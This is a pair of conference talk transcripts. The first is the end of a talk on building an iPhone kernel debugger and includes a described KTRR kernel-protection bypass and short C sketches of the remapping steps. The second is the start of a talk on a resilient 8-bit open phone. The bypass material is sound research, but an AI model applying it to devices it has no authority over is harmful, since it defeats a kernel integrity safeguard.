So what that looks like is initially the TTBR1 register is going to point to the root of the page tables, which lies inside the protected region. What we have to do is we need to copy the kernel, the pages containing the kernel, we need to copy the data of that onto new writable pages that are outside of the protected region, update the page tables in kernel memory, and then make TTBR1 point to the new modified page tables instead. And with that, we do now have the ability to patch the kernel. So the next step in this process is we need the ability to load kernel extensions. This actually turns out to be pretty simple once we bypass KTRR. All we have to do is we need to allocate some memory to put the kernel extension in, copy in the binary, dynamically link the kernel extension against the kernel that's running, because if you want to have a kernel extension, presumably you're going to want to call kernel functions at various points. After that, we need to modify page tables to make the kernel extension executable, and finally we need to call some function in the kernel extension to begin it running. And with that, we're now ready to start designing a kernel debugger. So what I eventually settled on was a pretty simple design. I would have one core in the CPU, which I called the monitor core, which is going to be exclusively reserved for the KTRW debugger itself. So it's no longer going to be running XNU. All of the other cores in the system are going to continue to run your operating system as they do normally. When you set a breakpoint or a watchpoint on one of the debugged cores, it's going to cause that core to halt and enter debug state. So the monitor core is just going to sit in a tight loop, polling all of the other cores to see when they enter debug state. And when it notices this, it'll send a message to LLDB over some communication channel saying, hey, this core halted because it hit a breakpoint, and then LLDB can take care of the rest. Now, when I implemented this, I pretty quickly encountered weird panic messages. So this is one example, AOP panic, no pulse on something or other. And it took a little bit of effort, but what I eventually learned was this was being caused by a processor on the device called the Always On Processor, sending periodic interrupts to the main application processor. And the interrupts that are sent by the Always On Processor need to be handled or else the AOP will panic. And once the AOP panics, it brings down the whole system. Now, some of these interrupts are actually relatively easy to disable. I reverse engineered the watchdog timer kernel extension and found the hardware interface, the set of registers needed to disable that. But there were other interrupts which I wasn't able to narrow down. I wasn't able to disable. Now, I strongly suspect that the dev-fused devices that some are able to acquire do have the ability to disable these interrupts, or in some way are not affected by this problem. Because presumably when Apple's engineers are using one of these devices to debug the kernel, and they halt the kernel for a few seconds, it's not a great user interface if when they resume execution, the whole kernel panics because of this interrupt problem. So I strongly suspect there's a way to fix this problem, but I wasn't able to find it. Instead, I basically implemented a big hack, which is that I started servicing interrupts from the AOP on the monitor core itself.
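Stepping back for a moment, that remapping step, roughly sketched in C, looks something like the following. Every name here is invented for the sketch; it is not Luca's code or the KTRW source, just the copy, fix up, switch sequence described above.

    #include <stdint.h>
    #include <string.h>

    /* Sketch: clone the KTRR-protected kernel onto fresh writable pages and
     * repoint TTBR1_EL1 at a copied, writable set of page tables. */
    extern void    *alloc_writable_pages(uint64_t size);       /* memory outside the KTRR region */
    extern void    *kernel_base(void);
    extern uint64_t kernel_size(void);
    extern uint64_t rebuild_page_tables(void *copy);           /* returns the new table root */
    extern void     write_ttbr1_el1(uint64_t root);
    extern void     tlb_flush_all(void);

    void remap_kernel_writable(void)
    {
        uint64_t size = kernel_size();
        void *copy = alloc_writable_pages(size);
        memcpy(copy, kernel_base(), size);             /* 1. duplicate the protected pages */
        uint64_t new_root = rebuild_page_tables(copy); /* 2. make kernel addresses resolve to the copy */
        write_ttbr1_el1(new_root);                     /* 3. switch translation to the new tables */
        tlb_flush_all();                               /* 4. the locked originals are now unreferenced */
    }

Anyway, back to that interrupt-servicing hack on the monitor core.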
Now, this introduced its own problem, which is that now execution on the monitor core can jump back into XNU and start running the IRQ handler at basically any time. And that includes when any of the debugged cores is halted holding an IRQ critical spin lock. This is a huge problem because once we try to acquire that same spin lock, we can't acquire it. It's already held. And the only way that lock can be released is if that debugged core is resumed, which has to be done by us. So we entered this deadlock. For a very long time, I thought this was pretty much an unsolvable problem for my debugger, but it actually turns out there's a really, really simple solution. And the reason is that the XNU kernel itself has to deal with this problem. See, when an IRQ is delivered and some code is processing the IRQ, if interrupts were enabled, then a second IRQ could be delivered and cause the IRQ handler to be re-entered, in which case that same lock would be grabbed a second time. What that means is that interrupts have to be disabled while in an IRQ critical region, which means it's really easy to test for whether it's safe to halt one of the debugged cores. You just check whether interrupts are enabled or not. If interrupts are disabled, that means that it's possibly in an IRQ critical region, and you just wait a little bit of time before halting that core. And after that, all of my interrupt problems pretty much disappeared. So now we're at the point where we have a kext running in the kernel. We seem to be able to halt and resume CPU cores, but we need some way for LLDB running on your laptop to communicate with the debugger running in your iPhone's kernel. I considered a number of different options, each with various advantages and disadvantages. Serial is really, really nice because it's incredibly simple to implement. USB I liked because it would be really, really fast. Wi-Fi, I kind of just threw in there in case the other two didn't work. There wasn't any really compelling reason to implement a debugger over Wi-Fi. What really made the decision was the disadvantages of each technique. So for Serial, as far as I'm aware, you do need special hardware in order to communicate with the iPhone over Serial. So this basically violates one of the goals of my homebrewed DevPhone, which is that you don't need any special hardware. Everything can be purchased from an Apple store. The other two techniques, USB and Wi-Fi, both suffered from the same problem, which is that I would need to write a custom driver for the hardware. The reason for this is that I cannot rely in my debugger on the code that I'm debugging. If I set a breakpoint and a CPU core halts while it has some lock used by the USB drivers, then when my application, or when my kernel debugger, tries to communicate over that mechanism using the stack built into XNU, it's going to try to take the same lock and deadlock, the same problem we had before. So whatever communication channel we use, we need to implement a custom driver for it, which is self-contained. So out of USB and Wi-Fi, I basically figured that writing a USB stack was slightly less painful. It was pretty easy to figure out with some Googling which hardware USB controller was used in the iPhone. It's a controller by Synopsys called the DesignWare Hi-Speed USB 2.0 On-The-Go controller. What's somewhat unfortunate about this controller is that it is proprietary.
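Going back to that halt-safety check for a second, the test really is just a look at the interrupt mask. A minimal sketch of the idea, with my phrasing and invented helpers rather than the KTRW source; how the debugger actually samples the target core's state is an implementation detail:

    #include <stdint.h>

    #define DAIF_I_MASKED (1u << 7)        /* the I bit in DAIF/PSTATE: IRQs are masked */

    /* hypothetical helpers */
    extern uint64_t sample_core_daif(int cpu);   /* however the debugger reads that core's DAIF */
    extern void     halt_core(int cpu);
    extern void     delay_us(unsigned us);

    void halt_core_when_safe(int cpu)
    {
        /* IRQs masked means the core may be inside an IRQ-critical spin lock;
         * halting it now could deadlock the monitor core's own IRQ handling */
        while (sample_core_daif(cpu) & DAIF_I_MASKED)
            delay_us(50);                  /* back off a little and re-test */
        halt_core(cpu);                    /* IRQs were enabled, so it is safe to stop here */
    }

Back to the USB controller.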
The interface that it uses to communicate is not one of the standard USB interfaces, which means that you cannot use kind of your stock open source off-the-shelf drivers for it. And when I tried to look at the data sheet to see how I could program my own driver, I quickly ran into a login wall. I couldn't actually access it, and I was unable to obtain the data sheet for it. So this seemed really problematic, but one thing that I could find was open source header files for this hardware. Now, there are open source drivers for operating it, but all the ones that I was able to find that operated this hardware did so in host mode, so kind of as a laptop rather than as a device you plug into it. And that didn't really work for me, so that wouldn't be...that wasn't what I wanted, but I was able to use the header files which contained the register definitions. Now, the only place that I could think of that contained a fully self-contained implementation of a USB stack that operated the exact same hardware as used in the iPhone was the iPhone's very own Secure ROM. So the Secure ROM is the very first piece of code that runs on the application processor when it starts up. And it needs a USB stack in order to communicate with a computer over USB for DFU firmware upgrades. So I basically took Apple's Secure ROM, there are dumps of it that you can find online, and I put it into IDA and reverse engineered the Secure ROM's USB stack basically back to source, and then re-implemented it in C. And so this was a rather painful process, but the end result was that I was able to make my iPhone appear to my laptop as a special KTRW USB device. And with that, the only step left in actually implementing a debugger is implementing the GDB stub. This is pretty easy as compared to kind of the other stuff in this project. The GDB specification is open source, it's basically just a bunch of parsing and then driving the external debug interface. And once that was done, I had the ability to debug a production iPhone over USB, no special cables, no leaked software involved. Yeah, it was pretty cool. So here I'll do a hopefully very quick demo of how to operate this debugger. So I have an iPhone, which you can see here. Right now you're able to see the kind of the screenshot of it on the laptop, but as soon as I operate the debugger, the USB stack will be taken over and you'll no longer be able to see this part of it. So what I'll do is I'll simply start the app that loads the kernel extension. And so once that's running, we'll lose connectivity with the device, but we can connect to it with LLDB. And yeah, okay, so LLDB has recognized this device as an iOS device, an iOS kernel cache. It's discovered the load address and it's halted the kernel. So we can now resume execution. Now I can't show this on the display, but for those of you in person, you can see that the device is still responsive. You can do things like load apps, and yet there's still a kernel debugger attached to the device. So we can do things, for example, I'll set a breakpoint on the syscall mincore. All right, so we have a breakpoint set. Now I have an application on the device that is simply going to call mincore with very distinctive arguments. It is possible to load an app onto the device over Wi-Fi even once the USB hardware has been co-opted. But for this demo, I'm just going to have the app pre-installed on the device. I'm going to click on the application icon and it basically immediately halts.
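As an aside on the GDB stub mentioned above: the remote serial protocol that LLDB speaks is just framed ASCII. A packet looks like "$<payload>#<two hex checksum digits>", the checksum is the payload bytes summed modulo 256, and the receiver answers with '+' or '-'. A toy receive loop might look like this, a sketch with invented I/O helpers rather than the actual KTRW stub:

    #include <stdint.h>
    #include <stddef.h>

    /* hypothetical byte-level I/O over the custom USB transport */
    extern int     usb_getc(void);
    extern void    usb_putc(char c);
    extern uint8_t hex_nibble(int c);               /* '0'-'9', 'a'-'f' -> 0-15 */

    /* Toy GDB remote-serial-protocol receiver.  Returns the payload length,
     * or -1 on a checksum mismatch (after asking for a retransmit). */
    int gdb_read_packet(char *buf, size_t max)
    {
        while (usb_getc() != '$') { }               /* wait for the start of a packet */
        size_t len = 0;
        uint8_t sum = 0;
        for (;;) {
            int c = usb_getc();
            if (c == '#')
                break;
            sum += (uint8_t)c;                      /* checksum is the mod-256 sum of the payload */
            if (len < max - 1)
                buf[len++] = (char)c;
        }
        buf[len] = '\0';
        uint8_t want = (uint8_t)((hex_nibble(usb_getc()) << 4) | hex_nibble(usb_getc()));
        usb_putc(sum == want ? '+' : '-');          /* ack, or ask for a retransmit */
        return sum == want ? (int)len : -1;
    }

    /* Dispatch is then mostly string matching: "g" reads registers, "m<addr>,<len>"
     * reads memory, "c" continues, "Z0"/"Z1" set breakpoints, and so on. */

Back to the demo.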
The phone is no longer responsive because we're halted at a breakpoint. We can do things like get a back trace. We can examine registers. So we can look at the memory pointed to by register X1 and we can indeed see our arguments that were passed from user space. We can do things like set watchpoints, kind of all of your standard debugging functionality. So we'll set a watchpoint on this memory address and resume execution and we basically immediately hit the watchpoint. And you can see the instruction that triggered this watchpoint loads X10 and X11. And these are indeed the values that we expect. So watchpoints seem to function correctly. We can disable the breakpoint and the watchpoint and resume execution. The app runs again. Your phone is responsive. So basically a full-featured kernel debugger. Cool. So thank you very much. The debugger source code is available on the Google Project Zero GitHub. I also wrote a blog post kind of describing in more detail the process of finding the KTRR bypass. This was a really, really fun project and I'm really excited to hopefully make kernel debugging on the iPhone just a little bit easier. Future versions will probably be based on the boot ROM exploit, which I'm really excited to see what comes out of that. So thank you. Thank you very much. So we have five minutes left for Q&A. Please queue up on the microphones in between. Microphone one, two, three, four. We have some more. And maybe you have questions from the signal angel. Signal angel. No questions from the signal angel. So microphone one, please. Yeah. Thanks for the amazing talk. At the beginning you showed us a tweet of the exploit and you said that everything you could do is possible with this one as well. And it said that it's not patchable. So do you see any problems regarding security or anything using such a technique? And is it possible to run it like without, I don't know, having the iPhone unlocked? And is there any way to sort of abuse this? Which could be wrong? Do you mean the boot ROM bug or do you mean the debugging registers used here or both or either? Yeah, just everything. All the above. I don't really know. This isn't really kind of my area of expertise. I can see some people might be able to leverage these types of vulnerabilities for proximal physical attacks. The debugging registers that I'm using here aren't really all that useful for a remote attack because you encounter that problem where a CPU resets and the KTRR bypass gets lost. And really once you have kernel code execution, you should really consider your device fully compromised anyway. So I don't really think that the debug registers are a security issue. The boot ROM may be for physical stuff, but it depends on your threat model. Thank you. Microphone 4, please. Did you have a look into the Linux kernel for the DesignWare 2 core driver, because it's in drivers/usb/dwc2, I think. Yeah, so this was actually really funny. Basically, as soon as I had finished implementing the USB stack and I'd got it working, I realized that the reason I couldn't find any open source drivers online was because I was searching for the wrong things in Google. I'm just really bad at Googling. And the files containing the driver for operating it in device mode were just named something different than I expected. So you learn as you go. Great. Thanks. Microphone 1, please. Hi. Great talk. I really enjoyed it. So I have a quick comment and then a question.
So the comment is this is the first time this is publicly revealed, but the Vita was actually, the TrustZone was first dumped exactly the same way, through the CoreSight registers. So that was 2014. I thought it was pretty funny seeing this still happening again and again. My question is you said you reversed the USB stack from the SecureROM. So did you find checkm8? So first about your comment, definitely I know that there are tons of people who have found similar capabilities. Basically, nothing that I've done in this project is original work. All of it is building off of stuff which other people have done. So absolutely that's definitely the case. About whether I discovered checkm8 or not, the first time I was looking at iBoot, I basically saw the USB stack code and was like, oh my God, this is so complicated. I want to avoid touching this if at all possible. So no, I completely missed that. Thank you. So no more questions. Please another big round of applause for Brandon. Thank you.
Development-fused iPhones with hardware debugging features like JTAG are out of reach for many security researchers. This talk takes you along my journey to create a similar capability using off-the-shelf iPhones. We'll look at a way to break KTRR, a custom hardware mitigation Apple developed to prevent kernel patches, and use this capability to load a kernel extension that enables full-featured, single-step kernel debugging with LLDB on production iPhones. This talk walks through the discovery of hardware debug registers on the iPhone X that enable low-level debugging of a CPU core at any time during its operation. By single-stepping execution of the reset vector, we can modify register state at key points to disable KTRR and remap the kernel as writable. I'll then describe how I used this capability to develop an iOS kext loader and a kernel extension called KTRW that can be used to debug the kernel with LLDB over USB.
10.5446/53159 (DOI)
Good evening. And welcome to day two of the congress. Our next speaker, Paul Gardner-Stephen, is fighting for free, secure and resilient communications. He's known as the leader of the Serval project, building cell phone mesh networks, and also is the creator of the Mega65 computer that you can see right here. So he's going to tell us about his next project right now and also explore some issues that we face about building networks and keeping them secure and resilient. So please welcome Paul Gardner-Stephen, creating resilient and sustainable mobile networks. A round of applause. Okay. Thanks for coming along tonight. It's getting a little bit late in the night. Certainly for me it is past my normal bedtime. So apologies if I yawn. It's not that I'm bored or disengaged. It's just I flew in from Australia yesterday and still haven't really had enough sleep. But we should be fine. So cool. So what we can see here, we have the Mega65 prototype and we have a prototype of the megaphone and I'll talk about those two in a minute. So the entire presentation is actually going to be delivered with the technology that we're creating. So it's a bit of a dog-food-eating session, and this kind of thing is a bit of a proof by example that we can actually do useful things with 8-bit systems. Because there's a whole pile of advantages when it comes to security and digital sovereignty with that. So we can switch the screen over to this screen. Super. Excellent. So we can have a look and make sure I've got the correct disk in there. Yes we do. We'll drop to C64 mode. And we'll load the... Oops, wrong one. Let's go. Fortunately we don't have to wait a long time. If I press and hold down the Caps Lock key the CPU runs at the full speed instead of normal speed. And so now it'll load up. It's Commodore 64 software right? So of course it has to be cracked. Even if I had to supply the original to the cracking crew because it's 2019. So we'll let that go because the graphics have changed a little bit as we go along and let the greets roll out there. So all of this has been created in FPGA. So we have complete sovereignty in that sense over the architecture so that we can really start trying to make systems that we have full control over from that full hardware layer and that are simple enough that we don't need to have a huge massive team of people to actually work on these things. A lot of what we're talking about here has been created in maybe three or four person years over the last few years. So it's quite possible to do a lot with these systems without needing to have the huge resources of a multinational company or something which is kind of key. So we'll do Mega65 36C3. OK, and I'll press F5 for presentation mode which really just hides the cursor. And then I can use my clicker. So we have moved, we'll switch the camera here for a moment. We switch the camera. Yep. So it's a genuine homemade Commodore 64 compatible joystick and it makes the most satisfying click noise when we use it. So if we can switch back to the slides, that will be great. Oh, yeah, super. Cool.
So actually the last talk was kind of interesting talking about this whole, a different angle, this whole thing that communications has actually become really weaponized over the last decade or two in particular that we're seeing that where it used to be natural disasters that are the main problem, that now there is this whole problem of man-made disasters which is a major problem for us. And so we see internet shutdowns, communication shutdowns, we have surveillance happening in different places where it really oughtn't be happening. These state-level actors that are very well resourced are able to find zero-day exploits and the attack surface as we know in modern communications devices is simply huge. And so this is very asymmetric in the power equation between forces that seek to oppress people and the vulnerable people at the coal face who are just trying to get on with their lives and live good and decent lives and need communications to help protect themselves and enable that to happen. And that we're seeing that the value of communications is so well understood by these, you know, oppressing forces that it really has become quite a, you know, it's quite high up their list of things to do. You know, you don't send the army in first to quieten people down, you cut off their internet as the first thing. So this is part of the backdrop of what we see. And so what I would say is that the digital summer has actually finished. We're now in the digital autumn. We can see, like with farms and trees and things, there's still plenty of fruit to see in the early autumn, right? And there's lots on the ground. It feels like this time of plenty will continue. And we can all eat as we need, that there is enough more or less to go around. But the risk that we have is from this parable of the grasshopper and the ant. Who here knows the parable of the grasshopper and the ant? Hands right up, it's really hard for me to see up here. We'll swap and say who doesn't know. Okay, cool. I thought it was originally a German kind of proverb. This is the story of where the grasshopper is lounging around and enjoying the summer while the ants carry all the seeds back into the nest. And the ants tell the grasshopper, hey, you need to get some food and stuff and put away for the winter so that you can actually survive the winter. And the grasshopper is basically in denial about the fact that the season will change. And then of course the season changes, it snows and gets cold. And then the grasshopper goes knocking on the door of the ant hole. Not that they really have doors, but that's fine. It's like, oh, I'm starving and cold out here. And the ant is like, well, I told you so kind of thing. And I think actually in the end, it lets it in because we don't want to scare children too much with these stories. And so this is actually the challenge that we have. I love every time I come to these events, all the creativity that we see. We're enjoying the digital summer and all of the things that it's letting us create and the great open source software and tools and everything that's going on is absolutely fantastic. And we want that to be able to continue indefinitely. But we know that as we said, the chilling winds are beginning to come that tell us that unless we actually do something about it, that this isn't actually going to continue indefinitely. And just a statement that I really want to make here is this last dot point that I've got.
The freedoms of the second half of the 20th century, post World War II, if you look at history, they are an aberration. To my knowledge, never before, and I fear perhaps never again, will we have that degree of personal liberty, focus on individual freedom and agency and everything that was in this post-war era and is now starting to unwind. And starting to unwind back to the normal, totally asymmetric, well, to say sharing of power is the wrong word, it's the greedy collection of power and deprivation of the mass population from having anything resembling a fair share of what's going on. And so we have to act if we want for the digital summer to continue, or at worst, for the digital winter to be as short and shallow as we can have it. So that we can come back to a new digital summer. Because once we hit the digital winter, it will actually be too late. Because if we push this analogy, the digital winter is the time when there is no food on the tree. It isn't any longer possible, or at least practical, to create new technologies to enable us to feed our digital needs. And we can't plant any new crops, so to speak, until the digital spring comes again after that. And so the opportunity, like with the grasshopper, is now before the winter comes to say, right, what do we need to have in our store of technologies, our store of protocols, all of these different things so that when the digital winter comes, we don't starve. And fortunately, we can actually change the length of the digital winter. We can empower people so that the bitter cold of the digital winter is moderated, and that the spring can come as soon as it can. And the trouble that we have with this, we actually don't know when the digital winter will come exactly. We see these challenges around in the way that different governments and non-state actors as well, working in propaganda, and all of these things that are becoming, sadly, more intense and acute around us, we don't know when that tipping point will happen. But given the complexity of supply chains and things that are necessary in this, and I think Bunny was talking about that earlier today, it is actually quite easy for things to quite quickly flip into the digital winter mode. And then, as with the real winter, at the very beginning of winter, there might still be enough to eat. But it gets harder and harder very rapidly, and if the winter gets too deep, then it's just not going to be possible to continue with these things. And so we've tried to think about what's needed to actually overcome this. What do we need focusing on mobile communications as a key piece of that? And there's a reason for that, in that it's a way that we can communicate, organize, you know, collectively protect communities against the threats that come in. If we look at things like the great Haiti earthquake just back in 2010, the breakdown of communications and law and order meant that there were quite horrible things going on within only about three days, actually, of the earthquake there. So there were militias that were basically robbing medical teams trying to transport people between different hospitals, and there were much nastier things with, you know, gangs of people going around from village to village, basically doing whatever they want to whoever they want. It was really not cool. And so we want to avoid that kind of problem that comes when people are not able to collectively work together effectively as a community.
And so the GPL four freedoms that we know from software, they're a great starting point. But I think actually we've seen enough things like with Tivoization and all of these sorts of other challenges that this is not sufficient when it comes to hardware. And there's actually some even more complicated things when you start talking about mobile phone kind of hardware as to how we can do that, which I'll talk about in a moment. But these are a starting point of what I've come up with as things that I see as being necessary. There's ample room for improvement. And in fact, with any of what we're trying to do in this space, we need folks to come along and help us. We can't do it alone. We need to work together so that we can help one another when the digital winter comes. So the first freedom is simply the freedom from energy infrastructure. We know critical infrastructure is disturbingly vulnerable, that the security of it is quite bad. But also you have these large centralized places that produce the energy that we need. And we see power cutoffs in Venezuela and all of these sorts of things regardless of who's actually doing it, whether it was sabotage or whether it was purposeful from the government. I don't know. It actually doesn't matter. The fact is it happens. But also, of course, in natural disaster, power goes out. Fortunately, this is actually one of the easiest things to solve. We just need to include some kind of alternative energy supply into the kind of devices that we're creating. So that could be a solar panel on the back. Or you could have the Faraday shake-it-like-a-martini kind of thing to generate power, or both, whatever you feel like. Or if you can find a good supply of ex-NASA radioisotopes, then we'll generate this. That would also be fantastic. And it'll keep you warm through the winter as well. But if anyone has a supply of those, let me know. I'd love to hear. So then the second freedom is actually quite similar to the first. It's the realization that we need energy to communicate and communications to organize ourselves and be effective. And again, the communications infrastructure is in many ways actually even more fragile than the energy production infrastructure. It's much easier to guard a couple of power stations in a country than it is to guard every phone tower and all of the interconnecting links and all of these sorts of things between them. You know, communications deprivation is already being weaponized against the vulnerable around us. Again, fortunately, there's been a whole pile of work in this space. So there's the previous work I've done with the Serval Mesh and there's, you know, Freifunk and, you know, a whole bunch of groups working on a whole bunch of different things in this kind of space for peer-to-peer secure authenticated communication. So yes, there's work to be done, but this is an area where, like the energy one, there's actually already been quite a lot of work done that makes it quite feasible to work on. So then we start getting to some of the harder ones. We need to make sure that we are not dependent on, you know, the major vendors of our devices when it comes to the security of our devices. So this starts with simple things like what the GPL provides. So you know, full source code has to be available. But more than that, we actually have to make sure that we can actually exercise those rights in practice.
So it needs to be simple enough that we can actually, you know, go right, okay, there's a security vulnerability in such and such, like, you know, Yusuke was talking about earlier today with some of the Bluetooth things, and then to actually be able to patch it yourself. It's quite obvious that this is not the case for whether it's firmware or whether it's the regular operating system on modern mobile phones. So who here has actually built Android from source themselves? Excellent, I expected to see a few folks here. Who's tried and given up in disgust? Right, more hands. Yes, myself as well. Like, you know, I work on the Serval project and we do a whole pile of things and basically just, you know, after spending a number of hours on it, just went like, you know, this is actually, this is a lot of work for something that ought to be straightforward if we want to be able to make rapid progress. And so we want to have systems that are simple enough that we can patch, but in fact there's another really key advantage to simplicity that I'll probably come back to a few times in this talk, and that is that simplicity reduces the attack surface. If we are in an asymmetric power environment where there are, whether they are state or non-state actors seeking to deprive vulnerable people of communications, they're going to have potentially the ability to put whole teams looking for vulnerabilities in software. In contrast, we might be lucky to have someone who's going to try and madly find when things are being exploited and to patch them. So we need to have ways around this kind of thing. And to my mind, reducing the attack surface is the only way that we can actually have any real hope of, you know, being able to keep up in that arms race of security. So freedom number four is related to this previous one. It's actually saying not only do we want to be able to patch it, we actually want to be able to change, enhance, do all of these things. And again, it comes back to the same basic need that the software is actually able to be compiled. And the hardware designs are simple enough that we can actually, you know, work on these things so that we, again, not merely in theory have permission to innovate, but that it's in practice feasible to do so. And again, the simpler the system, the more probable it is that we can actually succeed in this kind of space. And then, you know, again, a lot of these are quite interrelated, which is part of why I say it would actually be great to get feedback on how we might restructure these to make the boundaries really clear between these freedoms that we need. So we need the freedom to maintain the devices for the long run. So who here has or has had a Fairphone, for example? I love the Fairphone, by the way. Yep, a number of us. I've had one as well. And if you talk to the people at Fairphone, I think they have a team of a bunch of people just trying to maintain Android on the Fairphone 2, for example, and also now on the Fairphone 3 as it comes out. And this is actually really hard work.
But again, the complexity and the barriers that are there make it really difficult to be able to just keep the thing running with the same hardware, let alone each time you want to target new hardware with new capabilities, this is just going to be, you know, as a community, we can probably do one or two devices if we kind of all collected our effort in, but to actually do it for devices that meet individual needs or appropriate for a particular area might have, as we say, a different energy source, someone might want to try putting some thermal electric thing or whatever, that at the moment, to do that with mobile phone hardware is just prohibitive in the complexity and the resourcing and effort that it would require. So we need to find solutions around this. And then again, related to that, overall, we have this problem of scale dependency. I think this is one of the really key things at the moment to make a mobile phone. You need to have a big enough market and you need to have a big enough enterprise and enough capital and all of the rest of it to actually be able to go through the very expensive process of, you know, designing the thing, getting injection molding tooling and all of that kind of thing made, that, you know, to do that for a modern phone, I suspect it's a few million euros to do it reasonably well. And if you did it on the cheap and skinny, it's probably still going to be something like a million euros to achieve. So we have to somehow break this down to make it feasible to do. And as I said earlier, simplicity is a key theme to my mind. But it's the only way I think that we can actually do it. So we've already talked about the challenges of just building an Android ROM, let alone modifying it to do new things in any kind of sophisticated way. And even if you do, the hardware is actually too complicated and there's a whole pile of trust issues around the complicated hardware. If you can't understand something by definition, it's a black box. And if it's a black box, by definition, you can't trust it because you don't know what's inside. So, you know, we have this point, again, in the digital winter, you don't want any black boxes or if you do, you want them very carefully monitored and managed. And so the system has to be not simple enough to make once. It needs to be simple enough that we can actually remake it again and again and again as we have need. It's a bit like the difference between a chainsaw and an axe, right? If you want to be in a remote area and have to be self-sufficient, much better to depend on axe to chop your wood because if you need to, you can make a new handle for your axe and, you know, with a bit more effort, you could do some very simple metallurgy and, you know, metal smelting with iron or if you happen to be lucky enough to have an area or copper or whatever. It's going to be a much easier proposition than having to do that and then somehow make fine machine tooling and making new chain parts and motor parts and all of this kind of thing. So it has to be, if it's going to be resilient and survivable, it has to be simple enough that you actually can build it with relatively simple tools going forward. Electronics is always going to be a bit challenged in this area because, you know, you need to do PCB fabrication, you need to get components and things, but we have to try and reduce the barriers as much as we can so that at least, for example, components scavenging, for example, might be an option. 
Or devices that will be available because they're still needed by other industries that have more protection as we head into a digital winter environment that we can take and repurpose that kind of hardware. So then this kind of leads into this tension then of saying, okay, if we make something which is simple enough, we know we as a community, we only have limited resources available to us to make this kind of resilient device, do we make one or do we all kind of like run off and make different kind of things? And I think this is a tension. I'm not going to claim that I know the absolute best setting for this. I think we need to have, as I say, kind of multiple germ lines so that if one system gets critically broken or proves to be ineffective and that there are others kind of in the wing that can kind of fill that niche in the environment, but we don't want to have so many that we actually don't get anywhere. And so this is a bit tricky. My gut feeling is making an initial device that can kind of demonstrate some of these kind of positive properties and then so other people will look at it and go like, well, that's really great. That's got us forward. But you know that was a really stupid design. I think this is a way better way to do it in the way that we have that freedom in the open source community to do is probably a pretty good way to do things. And I would say we're not yet at that end point of that proof of concept, but we're trying to move things forward to that and that point. So come actually to the megaphone that we're trying to create. And so in terms of what we've actually set out to do for the goals and kind of the methodology, we want something which is simple, secure, self-sufficient and survivable. A lot of the work that I do is, for example, with NGOs. We've worked with folks from Red Cross. We've worked with folks from the UN World Food Programme who, pardon me, interestingly are the distributors of communications in the UN cluster system for disasters because they kind of like hand out blankets and they hand out rice and things. Someone basically said to them, well, you should also be handing out the communications. And so that's just kind of how it's fell. And so, you know, and it needs to be able to do smart phony kind of things. Like we're great to have some navigation. It would be great to have in the disaster context the ability to fill in forms on the screen with a touch screen and the rest of it and have that uplink through. So for example, you think, you know, an Ebola outbreak in Africa, for example, to be able to collect, you know, that case information to track down the, you know, the case of heroes and all that kind of thing. You need communications that can work. Often these outbreaks happen in places where law and order and civil society is not really working because if it was, then they wouldn't have had the outbreak there. It would have been managed more effectively. And so you need this kind of, you know, dependable device that can work independent of everything else that's going on. And that might have to do software updates, for example, over a really expensive narrow band satellite link that might be, you know, tens of bytes per second or less. So that was kind of some of the, you know, the motivation around this to create it. And separately have been working on the Mega 65 project for a couple of years at that point. 
And it just kind of dawned on me that actually this kind of simple 8-bit architecture is powerful enough to actually be useful to do some things. And that's kind of, you know, why are we doing this, you know, the fun proof of, you know, proof by example, really of delivering the slides with this machine to show that you can do useful things if you write the code carefully and carefully written code is more likely to be verifiable and secure. And it's probably, I don't think you can get any simpler than an 8-bit system and still be useful. Like, I don't think we want to be trying to use an Intel 4004-derived 4-bit CPU to do things. By all means, if someone can find a way to do something with a system that's that simple and they can still do everything we need and it makes it even easier to verify, fantastic. My gut feeling is it would actually be worse on every point because the amount of work that you would have to do to do each useful thing, you end up with code which is actually larger in size. That I think my feeling is that the 8-bit architecture is about that sweet point. And so anyway, as a result of the Mega65 work, it's based directly on that. So the phone actually is a Mega65 in portable form and we'll show that in a little bit. And so we're getting towards that kind of proof of concept stage. We had the first phone calls back at linux.conf.au. So if you kind of dig back through the video of that talk where with a much earlier prototype, we actually had people calling the machine, which is quite fun. And I'll talk a little bit later as well about some of the audio path kind of issues around that. So let's look at those six freedoms again now in what we're trying to do with the megaphone. So energy independence. The first step is we've got a filthy great big battery. I hate it when phones go flat and when you're in a disaster zone or these kind of vulnerable situations you really don't want it going flat at the wrong time. So we've put a 32-watt-hour lithium iron phosphate battery that should have 2,000 full charge cycles in there. The device is about the size of a Nintendo Switch in terms of surface area. So putting high-performance solar cells like you would put on a solar racing car or on your roof, we can probably get about 7 watts with that. And you do the kind of math that's four or so hours of charge time. But we know in reality that the solar environment will often be much worse than that. It might be only 10%. It might only be 1% of that if you're talking about these kinds of latitudes under cloudy conditions. And so you really want to have the big battery and as big a solar panel as you can. And you want the power consumption to be as low as possible. So we've got CPLDs, which are kind of like little teeny tiny FPGAs that are managing the whole power environment and wake up the main FPGA only when something important needs to happen. So we believe with 32 watt hours we should be able to get about 1,000 hours standby with a 4G off-the-shelf cellular modem. And that's assuming that the solar panel was actually in a black box. Even the light here, if we had the 7 watt solar panel and had it sunny side up, we would be able to maintain charge indefinitely on the device because we only need to have about 8 milliwatts coming in. So we're talking about a thousandth of the capacity of the solar panel. So for communications independence, we really want as many possible ways to communicate as we can.
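As an aside, the arithmetic behind those power figures, taking the talk's round numbers at face value, works out roughly like this:

    \[
    \frac{32\ \text{Wh}}{7\ \text{W}} \approx 4.6\ \text{h of full-sun charging},
    \qquad
    \frac{32\ \text{Wh}}{1000\ \text{h}} = 32\ \text{mW average standby budget},
    \qquad
    8\ \text{mW} \approx \frac{7\ \text{W}}{1000}.
    \]

So the quoted 8 milliwatt trickle is about a thousandth of the panel's full-sun output, which is where the claim about holding charge under indoor light comes from. Anyway, back to the communications side.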
